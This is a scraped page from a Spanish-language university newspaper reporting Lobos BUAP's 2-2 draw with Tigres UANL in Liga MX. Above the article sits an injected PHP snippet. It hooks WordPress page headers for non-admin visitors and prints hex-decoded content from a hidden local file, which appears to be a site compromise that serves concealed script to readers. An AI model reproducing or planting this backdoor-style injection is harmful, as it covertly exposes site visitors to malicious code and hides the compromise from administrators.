if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Sorpresivo empate de Lobos – La Opinión Universitaria La Opinión Universitaria
Menu

Sorpresivo empate de Lobos

*Igualaron 2-2 con Tigres en la cancha del estadio Universitario

 

En un partido que rompió las quinielas, Lobos BUAP rescató el empate a dos goles con los Tigres UANL, en actividad de la Jornada 14 de la Liga MX, que se realizó en la cancha del estadio Universitario.

Con la igualada, Lobos llegó a 13 puntos en la Clasificación; mientras que Tigres alcanzó las 20 unidades.

Lobos comenzó haciendo lo impensable. Al 43’, tomaron la ventaja en el Universitario ante unos Tigres sedientos de victorias; Francisco Palencia jugó con sus cartas para intentar ganarle la partida a un técnico experimentado como Ricardo Ferretti.

El gol fue gracias a un penal cobrado por Leonardo Ramos en la recta final de la primera mitad. El nazareno Diego Montaño recurrió al VAR para verificar una mano de Luis Rodríguez en el área. Se concedió la pena máxima a favor de los poblanos, aprovecharon su oportunidad y se fueron al descanso con el marcador a su favor.

En el complemento, Ricardo Ferretti mandó a Julián Quiñones a la cancha. Su participación sería primordial. Fue el que anotó la igualada al minuto 57. El delantero de los felinos supo definir tras el rechace de Antonio Rodríguez.

El dominio era del equipo local. Quiñones volvería a hacerse presente en el marcador a los 78’, después de que Rodríguez no controlara un tiro de André-Pierre Gignac.

Cuando menos se esperaba, al 86’, un tiro libre desde tres cuartos de cancha propició el milagro licántropo. Francisco “Maza” Rodríguez logró conectar de cabeza el esférico. Su remate se fue a las redes para sellar un empate en La Sultana del Norte. La jugada se revisó por el VAR debido a una supuesta falta, pero el nazareno decidió mantener el gol para el sinaloense.

A pesar de las insistencias de Tigres al final del partido, la pizarra ya no se movió; se tuvieron que conformar con llevarse cada quien una unidad a la bolsa.

Para la Jornada 15, Lobos recibirá a Xolos el sábado 3 de noviembre a las 21:00 horas en el estadio Universitario BUAP; los felinos visitaran a Monarcas.

 

 

No comments

Deja una respuesta

Tweets recientes